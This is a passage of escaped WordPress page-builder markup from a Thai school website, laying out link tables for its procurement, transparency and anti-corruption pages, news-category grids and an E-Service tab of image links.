data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" 